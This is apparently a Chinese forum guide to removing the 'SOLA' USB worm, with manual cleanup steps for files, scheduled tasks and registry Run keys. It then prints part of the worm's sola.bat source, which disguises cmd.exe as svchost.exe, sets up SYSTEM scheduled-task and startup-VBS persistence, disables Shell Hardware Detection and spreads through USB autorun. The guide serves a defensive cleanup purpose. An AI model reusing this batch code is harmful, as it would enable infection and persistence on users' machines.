解决方法二:一、进安全模式1.同样用“资源管理器”进入各盘符目录下,删除隐藏的“SOLA”文件夹和“Autorun.inf”文件然后去360网站上下载一个“U盘病毒专杀工具”查杀完后弹出窗口“是否……”点击“是”,然后会询问“是否创建XXX”点击创建,该软件就会在各个盘符下创建一个名问“Autorun.inf”的假病毒文件,这样就能防止病毒再创建此文件。2.“搜索文件或文件夹”关键字“sola”的所有文件和文件夹,删除所有有关sola这个名字的文件和文件夹。3.可手动找到并删除下列文件。%systemroot%\\Fonts\\Regedit.reg%systemroot%\\Fonts\\sleep.exe%systemroot%\\Fonts\\SOLA.BAT%systemroot%\\Fonts\\est_type2032.fon%systemroot%\\Tasks\\Tasks.job%systemroot%\\Fonts\\solasetup%systemroot%\\Tasks\\Tasks.job4.按创建时间排序,删除所有和其同一时间创建的文件。 5.打开注册表(点击“开始”——“运行”,输入“regedit”,回车)6.鼠标点选注册表左边目录最上方“我的电脑”,然后点击“编辑”——“查找”,输入“SOLA”删除所有相关的“项”“值”“数据” 注:有些软件的名字中带有“SOLA”,但并不是病毒,要区分开来。(如下图所示就不属于病毒项)病毒的“项”“值”“数据”一般一眼就能看出。[attach]27266[/attach]-----------------------7.木马为了能够在开机后自动运行,往往在注册表如下选项中添加注册表项: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 删除不明项。(也可用360安全卫士查看启动项)在“C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动”中有一个SOLA.vbs文件(注:这里我记得不太清楚了,因为我忘了保存该文件的样本)8.最后再检查一下所有盘符,看看“SOLA”文件夹是否删除干净,如还存在需再删一次,“Autorun.inf”文件就不需要删除了,那是专杀工具创建用来欺骗病毒的文件。9.删除你的U盘、MP3等一切USB接口硬件中的“SOLA”文件夹;当然用手机内存读卡器的也会中标。10.重启电脑,搞定。下面附上“sola.bat”中的内容:@echo offset sola=%systemroot%\\Fontsset setup=%systemroot%\\Fonts\\solasetupif not \"%1\"==\"-USB\" goto Startstart /max ..if exist %sola%\\SOLA.BAT goto End::========================Infect==============================:Infectcd\\md %systemroot%\\Fonts\\solasetup::————文件复制---------copy sola\\Autorun.inf %setup%\\Autorun.infcopy sola\\SOLA.BAT %setup%\\SOLA.BATcopy sola\\宅男请进.RAR %setup%\\宅男请进.RARcopy sola\\Tasks.xxx %setup%\\Tasks.xxxcopy sola\\sleep.exe %setup%\\sleep.exetasklist >%sola%\\task.txtFOR /F \"tokens=1\" %%i in (\'findstr /I \"svchost.exe\" \"%sola%\\task.txt\"\') do set svchost=%%icopy %systemroot%\\system32\\cmd.exe %sola%\\%svchost%del %sola%\\task.txt:Taskscopy %setup%\\Tasks.xxx %systemroot%\\Tasks\\Tasks.jobschtasks /change /ru \"NT AUTHORITY\\SYSTEM\" /tn \"Tasks\" if errorlevel 1 goto TaskFailgoto TaskSuc:TaskFail%homedrive%cd \"%ALLUSERSPROFILE%\"cd 「开始」菜单\\程序\\启动echo On Error Resume Next>SOLA.VBSecho set ws=wscript.createobject(\"wscript.shell\")>>SOLA.VBSecho ws.run \"%sola%\\svchost.exe /c %sola%\\SOLA.BAT\",0 >>SOLA.VBScopy SOLA.VBS %sola%\\SOLA.VBSecho NT>%systemroot%\\Fonts\\NoTasks:TaskSucattrib %systemroot%\\Tasks\\Tasks.job +s +h +rcopy %setup%\\sola.bat %sola%\\sola.batcopy %setup%\\sleep.exe %systemroot%\\system32\\sleep.exe:NoAutoPlaynet stop \"Shell Hardware Detection\"echo Windows Registry Editor Version 5.00>%systemroot%\\Fonts\\Regedit.regecho [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetection]>>%systemroot%\\Fonts\\Regedit.regecho \"Start\"=dword:00000004>>%systemroot%\\Fonts\\Regedit.regstart regedit /s %systemroot%\\Fonts\\Regedit.reg:KillTMGgoto End::======================Infect======================================::======================Start=======================================:Start%homedrive%cd \"%ALLUSERSPROFILE%\"cd 「开始」菜单\\程序\\启动date /t >%sola%\\est_type2032.fonfindstr /c:\"-10-01\" \"%sola%\\est_type2032.fon\" if not errorlevel 1 goto DayOnif exist %systemroot%\\Fonts\\NoTasks if not exist SOLA.VBS copy %sola%\\SOLA.VBS SOLA.VBS:Continuesleep 300set C=0 & echo 1>C:\\solachk1 & findstr . C:\\solachk1 & if not errorlevel 1 del C:\\solachk1 & sleep 1000&set C=1 & findstr /C:\"SOLA_1.0\" C:\\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\\Autorun.inf
